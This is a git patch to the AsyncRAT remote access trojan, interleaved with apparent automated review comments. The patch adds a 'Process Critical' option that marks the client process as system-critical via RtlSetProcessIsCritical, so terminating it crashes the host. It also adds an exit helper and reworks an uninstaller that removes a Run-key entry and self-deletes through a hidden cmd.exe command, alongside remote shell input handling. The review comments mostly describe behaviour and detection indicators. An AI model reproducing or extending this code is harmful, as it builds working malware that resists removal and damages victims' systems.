From 1846a77b5a77103e8d9f0992d021d682dbf9159c Mon Sep 17 00:00:00 2001 From: NYAN CAT Date: Mon, 20 May 2019 18:34:33 +0300 Subject: [PATCH] Update -Added process critical - thanks to MrDevBot -Add a method to handle client's exit -Minor bugs fixed --- AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs | 7 ++- .../Forms/FormBuilder.Designer.cs | 36 ++++++++++++++-- .../AsyncRAT-Sharp/Forms/FormBuilder.cs | 5 ++- AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs | 2 +- AsyncRAT-C#/Client/Client.csproj | 1 + AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs | 6 ++- .../Client/Handle Packet/HandleUninstall.cs | 43 +++++++++---------- AsyncRAT-C#/Client/Handle Packet/Packet.cs | 6 +-- AsyncRAT-C#/Client/Helper/Methods.cs | 8 ++++ AsyncRAT-C#/Client/Helper/ProcessCritical.cs | 32 ++++++++++++++ AsyncRAT-C#/Client/Install/NormalStartup.cs | 3 +- AsyncRAT-C#/Client/Program.cs | 3 ++ AsyncRAT-C#/Client/Settings.cs | 7 ++- 13 files changed, 120 insertions(+), 39 deletions(-) create mode 100644 AsyncRAT-C#/Client/Helper/ProcessCritical.cs diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs index c8abfc3..0d77e0f 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs @@ -77,7 +77,10 @@ namespace AsyncRAT_Sharp this.Text = $"{Settings.Version}"; #if DEBUG Settings.ServerCertificate = new X509Certificate2(Convert.FromBase64String("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")); - Settings.Port = "6606"; + listener = new Listener(); + Thread thread = new Thread(new ParameterizedThreadStart(listener.Connect)); + thread.IsBackground = true; + thread.Start(6606); #else using (FormPorts portsFrm = new FormPorts()) { 
@@ -106,7 +109,7 @@ namespace AsyncRAT_Sharp listener = new Listener(); Thread thread = new Thread(new ParameterizedThreadStart(listener.Connect)); thread.IsBackground = true; - thread.Start(Convert.ToInt32(port.ToString().Trim())); + thread.Start(Convert.ToInt16(port.ToString().Trim())); } } } diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.Designer.cs index 5b717cf..733026f 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.Designer.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.Designer.cs @@ -46,6 +46,7 @@ namespace AsyncRAT_Sharp.Forms this.label3 = new System.Windows.Forms.Label(); this.label4 = new System.Windows.Forms.Label(); this.groupBox3 = new System.Windows.Forms.GroupBox(); + this.chkBdos = new System.Windows.Forms.CheckBox(); this.txtMutex = new System.Windows.Forms.TextBox(); this.label5 = new System.Windows.Forms.Label(); this.chkAnti = new System.Windows.Forms.CheckBox(); @@ -54,6 +55,7 @@ namespace AsyncRAT_Sharp.Forms this.tabPage1 = new System.Windows.Forms.TabPage(); this.tabPage2 = new System.Windows.Forms.TabPage(); this.tabPage3 = new System.Windows.Forms.TabPage(); + this.pictureBox1 = new System.Windows.Forms.PictureBox(); this.groupBox1.SuspendLayout(); this.groupBox2.SuspendLayout(); this.groupBox3.SuspendLayout(); @@ -61,11 +63,12 @@ namespace AsyncRAT_Sharp.Forms this.tabPage1.SuspendLayout(); this.tabPage2.SuspendLayout(); this.tabPage3.SuspendLayout(); + ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit(); this.SuspendLayout(); // // button1 // - this.button1.Location = new System.Drawing.Point(6, 236); + this.button1.Location = new System.Drawing.Point(3, 302); this.button1.Name = "button1"; this.button1.Size = new System.Drawing.Size(440, 49); this.button1.TabIndex = 0; 
@@ -225,20 +228,32 @@ namespace AsyncRAT_Sharp.Forms // // groupBox3 // + this.groupBox3.Controls.Add(this.pictureBox1); + this.groupBox3.Controls.Add(this.chkBdos); this.groupBox3.Controls.Add(this.txtMutex); this.groupBox3.Controls.Add(this.label5); this.groupBox3.Controls.Add(this.chkAnti); this.groupBox3.Location = new System.Drawing.Point(6, 17); this.groupBox3.Name = "groupBox3"; - this.groupBox3.Size = new System.Drawing.Size(440, 174); + this.groupBox3.Size = new System.Drawing.Size(440, 229); this.groupBox3.TabIndex = 9; this.groupBox3.TabStop = false; this.groupBox3.Text = "MISC"; // + // chkBdos + // + this.chkBdos.AutoSize = true; + this.chkBdos.Location = new System.Drawing.Point(21, 82); + this.chkBdos.Name = "chkBdos"; + this.chkBdos.Size = new System.Drawing.Size(143, 24); + this.chkBdos.TabIndex = 12; + this.chkBdos.Text = "Process Critical"; + this.chkBdos.UseVisualStyleBackColor = true; + // // txtMutex // this.txtMutex.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "Mutex", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged)); - this.txtMutex.Location = new System.Drawing.Point(106, 98); + this.txtMutex.Location = new System.Drawing.Point(106, 165); this.txtMutex.Name = "txtMutex"; this.txtMutex.Size = new System.Drawing.Size(271, 26); this.txtMutex.TabIndex = 11; @@ -247,7 +262,7 @@ namespace AsyncRAT_Sharp.Forms // label5 // this.label5.AutoSize = true; - this.label5.Location = new System.Drawing.Point(14, 102); + this.label5.Location = new System.Drawing.Point(14, 169); this.label5.Name = "label5"; this.label5.Size = new System.Drawing.Size(52, 20); this.label5.TabIndex = 10; 
@@ -308,6 +323,16 @@ namespace AsyncRAT_Sharp.Forms this.tabPage3.Text = "Misc"; this.tabPage3.UseVisualStyleBackColor = true; // + // pictureBox1 + // + this.pictureBox1.Image = global::AsyncRAT_Sharp.Properties.Resources.uac; + this.pictureBox1.Location = new System.Drawing.Point(181, 74); + this.pictureBox1.Name = "pictureBox1"; + this.pictureBox1.Size = new System.Drawing.Size(32, 32); + this.pictureBox1.SizeMode = System.Windows.Forms.PictureBoxSizeMode.AutoSize; + this.pictureBox1.TabIndex = 13; + this.pictureBox1.TabStop = false; + // // FormBuilder // this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F); @@ -329,6 +354,7 @@ namespace AsyncRAT_Sharp.Forms this.tabPage1.ResumeLayout(false); this.tabPage2.ResumeLayout(false); this.tabPage3.ResumeLayout(false); + ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit(); this.ResumeLayout(false); } @@ -359,5 +385,7 @@ namespace AsyncRAT_Sharp.Forms private System.Windows.Forms.TabPage tabPage1; private System.Windows.Forms.TabPage tabPage2; private System.Windows.Forms.TabPage tabPage3; + private System.Windows.Forms.CheckBox chkBdos; + private System.Windows.Forms.PictureBox pictureBox1; } } diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs index 72e2941..0aa920c 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs @@ -147,6 +147,9 @@ namespace AsyncRAT_Sharp.Forms if (operand == "%Serversignature%") methodDef.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(signature)); + if (operand == "%BDOS%") + methodDef.Body.Instructions[i].Operand = chkBdos.Checked.ToString().ToLower(); + if (operand == "%Pastebin%") if (chkPastebin.Checked) methodDef.Body.Instructions[i].Operand = aes.Encrypt(txtPastebin.Text); @@ -158,7 +161,7 @@ namespace AsyncRAT_Sharp.Forms } } } - + } private void CheckBox2_CheckedChanged(object sender, EventArgs e) 
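Review bot: The `%BDOS%` branch in FormBuilder.cs writes the plain result of `chkBdos.Checked.ToString().ToLower()`, while the neighbouring `%Serversignature%` and `%Pastebin%` values in the same hunk go through `aes.Encrypt`, and no comment records the difference. A one-line comment such as `// BDOS is stored unencrypted as "true"/"false", unlike the AES-encrypted fields` would make the stored format explicit for anyone parsing a built client's configuration. The matching client field is `public static string BDOS = "%BDOS%";` in Client/Settings.cs. The enclosing method starts and ends outside the hunk, so how the remaining placeholders are stored is not visible here.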
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs index 2ef0358..2e9aa6c 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs @@ -16,6 +16,6 @@ namespace AsyncRAT_Sharp public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12"; public static X509Certificate2 ServerCertificate; - public static readonly string Version = "AsyncRAT 0.4.8B"; + public static readonly string Version = "AsyncRAT 0.4.8C"; } } diff --git a/AsyncRAT-C#/Client/Client.csproj b/AsyncRAT-C#/Client/Client.csproj index c2881c5..4e6c1a4 100644 --- a/AsyncRAT-C#/Client/Client.csproj +++ b/AsyncRAT-C#/Client/Client.csproj @@ -105,6 +105,7 @@ FormChat.cs + diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs b/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs index 4204720..0cdf8d5 100644 --- a/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs +++ b/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs @@ -1,4 +1,5 @@ -using Microsoft.Win32; +using Client.Helper; +using Microsoft.Win32; using System; using System.Collections.Generic; using System.Diagnostics; @@ -6,6 +7,7 @@ using System.IO; using System.Linq; using System.Security.Principal; using System.Text; +using System.Windows.Forms; namespace Client.Handle_Packet { @@ -28,7 +30,7 @@ namespace Client.Handle_Packet } }; proc.Start(); - Environment.Exit(0); + Methods.ClientExit(); } catch { } } diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs b/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs index ebfe442..342e6fc 100644 --- a/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs +++ b/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs 
@@ -10,14 +10,14 @@ using System.Text; namespace Client.Handle_Packet { - public class HandleUninstall + public class HandleUninstall { public HandleUninstall() { - if (Convert.ToBoolean(Settings.Install)) + if (Convert.ToBoolean(Settings.Install)) + { + try { - try - { if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run").DeleteValue(Path.GetFileName(Settings.ClientFullPath)); else @@ -34,25 +34,24 @@ namespace Client.Handle_Packet } } catch { } - } - ProcessStartInfo Del = null; - try + } + ProcessStartInfo Del = null; + try + { + Del = new ProcessStartInfo() { - Del = new ProcessStartInfo() - { - Arguments = "/C choice /C Y /N /D Y /T 1 & Del \"" + Process.GetCurrentProcess().MainModule.FileName + "\"", - WindowStyle = ProcessWindowStyle.Hidden, - CreateNoWindow = true, - FileName = "cmd.exe" - }; - } - catch { } - finally - { - Methods.CloseMutex(); - Process.Start(Del); - Environment.Exit(0); - } + Arguments = "/C choice /C Y /N /D Y /T 1 & Del \"" + Process.GetCurrentProcess().MainModule.FileName + "\"", + WindowStyle = ProcessWindowStyle.Hidden, + CreateNoWindow = true, + FileName = "cmd.exe" + }; + } + catch { } + finally + { + Process.Start(Del); + Methods.ClientExit(); + } } } } diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs index 75fc7af..d4846b7 100644 --- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs +++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs @@ -85,7 +85,7 @@ namespace Client.Handle_Packet ClientSocket.Client.Dispose(); } catch { } - Environment.Exit(0); + Methods.ClientExit(); break; } @@ -98,7 +98,7 @@ namespace Client.Handle_Packet } catch { } Process.Start(Application.ExecutablePath); - Environment.Exit(0); + Methods.ClientExit(); break; } 
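Review bot: The re-indented `HandleUninstall` constructor still has no comment stating what it removes from the host, and both `catch { }` blocks discard every failure, so its effect can only be learned by tracing the code. A header comment should say that it deletes the `SOFTWARE\Microsoft\Windows\CurrentVersion\Run` value named after the client file (the non-admin branch shown in the first HandleUninstall hunk) and then starts a hidden `cmd.exe` with `/C choice /C Y /N /D Y /T 1 & Del "<own path>"` before calling `Methods.ClientExit()`. Those are the two actions that registry auditing and process-creation logging would record for this routine, so stating them in the source helps anyone writing or validating detections against it. The admin branch of the first hunk is cut off outside the visible lines.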
@@ -270,7 +270,7 @@ namespace Client.Handle_Packet case "shellWriteInput": { if (HandleShell.ProcessShell != null) - HandleShell.ShellWriteLine(unpack_msgpack.ForcePathObject("WriteInput").AsString); + HandleShell.ShellWriteLine(unpack_msgpack.ForcePathObject("WriteInput").AsString); break; } diff --git a/AsyncRAT-C#/Client/Helper/Methods.cs b/AsyncRAT-C#/Client/Helper/Methods.cs index f166be1..65bdcd2 100644 --- a/AsyncRAT-C#/Client/Helper/Methods.cs +++ b/AsyncRAT-C#/Client/Helper/Methods.cs @@ -43,5 +43,13 @@ namespace Client.Helper _appMutex = null; } } + + public static void ClientExit() + { + if (Convert.ToBoolean(Settings.BDOS)) + ProcessCritical.Exit(); + CloseMutex(); + Environment.Exit(0); + } } } diff --git a/AsyncRAT-C#/Client/Helper/ProcessCritical.cs b/AsyncRAT-C#/Client/Helper/ProcessCritical.cs new file mode 100644 index 0000000..640af11 --- /dev/null +++ b/AsyncRAT-C#/Client/Helper/ProcessCritical.cs @@ -0,0 +1,32 @@ +using System; +using System.Diagnostics; +using System.Runtime.InteropServices; + +namespace Client.Helper +{ + public static class ProcessCritical + { + public static void Set() + { + try + { + Process.EnterDebugMode(); + RtlSetProcessIsCritical(1, 0, 0); + } + catch { } + } + public static void Exit() + { + try + { + RtlSetProcessIsCritical(0, 0, 0); + } + catch { } + } + + #region "Native Methods" + [DllImport("ntdll.dll", SetLastError = true)] + private static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3); + #endregion + } +} diff --git a/AsyncRAT-C#/Client/Install/NormalStartup.cs b/AsyncRAT-C#/Client/Install/NormalStartup.cs index 6f0b62a..7749179 100644 --- a/AsyncRAT-C#/Client/Install/NormalStartup.cs +++ b/AsyncRAT-C#/Client/Install/NormalStartup.cs @@ -69,9 +69,8 @@ namespace Client.Install WindowStyle = ProcessWindowStyle.Hidden }); } - Methods.CloseMutex(); Process.Start(Settings.ClientFullPath); - Environment.Exit(0); + Methods.ClientExit(); } } catch (Exception ex) 
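Review bot: `Methods.ClientExit()` is the only place in this commit that clears the critical flag before the process ends, and nothing documents that. Any termination that bypasses it, such as an unhandled exception or an external kill, leaves the flag from `ProcessCritical.Set()` in place. A doc comment should state the contract, for example `/// Clears the process-critical flag when Settings.BDOS is true, releases the mutex, then exits; other termination paths leave the flag set.` For incident response, the caveat is that stopping a client built with this option is expected to bugcheck the host, so isolate the machine and capture volatile data before terminating the process.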
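Review bot: The new `ProcessCritical` class has no comment explaining what `Set()` does to the host: `RtlSetProcessIsCritical(1, 0, 0)` marks the process as system-critical, and Windows bugchecks when such a process terminates. `Process.EnterDebugMode()` requests SeDebugPrivilege first, so the call should only take effect when the client runs elevated, and the empty `catch { }` hides the failure otherwise. `Program.cs` calls `Set()` at startup when `Settings.BDOS` is true. Suggested header: `// Marks the current process as critical via ntdll!RtlSetProcessIsCritical; terminating it while the flag is set crashes the OS.` For detection, the `[DllImport("ntdll.dll")]` declaration leaves the `RtlSetProcessIsCritical` import name in the assembly metadata, which serves as a static indicator that a sample carries this option.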
diff --git a/AsyncRAT-C#/Client/Program.cs b/AsyncRAT-C#/Client/Program.cs index 6c353ca..ef1b9e8 100644 --- a/AsyncRAT-C#/Client/Program.cs +++ b/AsyncRAT-C#/Client/Program.cs @@ -34,6 +34,9 @@ namespace Client if (Convert.ToBoolean(Settings.Install)) NormalStartup.Install(); + if (Convert.ToBoolean(Settings.BDOS)) + ProcessCritical.Set(); + #if DEBUG ClientSocket.InitializeClient(); #else diff --git a/AsyncRAT-C#/Client/Settings.cs b/AsyncRAT-C#/Client/Settings.cs index ff2d5f3..5b2ff84 100644 --- a/AsyncRAT-C#/Client/Settings.cs +++ b/AsyncRAT-C#/Client/Settings.cs @@ -12,7 +12,7 @@ namespace Client #if DEBUG public static string Ports = "6606"; public static string Hosts = "127.0.0.1"; - public static string Version = "AsyncRAT 0.4.8d"; + public static string Version = "AsyncRAT 0.4.9C"; public static string Install = "false"; public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe"); public static string Key = "NYAN CAT"; @@ -23,10 +23,12 @@ namespace Client public static string Anti = "false"; public static Aes256 aes256 = new Aes256(Key); public static string Pastebin = "null"; + public static string BDOS = "false"; + #else public static string Ports = "%Ports%"; public static string Hosts = "%Hosts%"; - public static string Version = "AsyncRAT 0.4.9B"; + public static string Version = "AsyncRAT 0.4.9C"; public static string Install = "%Install%"; public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%Folder%"), "%File%"); public static string Key = "%Key%"; @@ -37,6 +39,7 @@ namespace Client public static readonly string Anti = "%Anti%"; public static Aes256 aes256; public static string Pastebin = "%Pastebin%"; + public static string BDOS = "%BDOS%"; #endif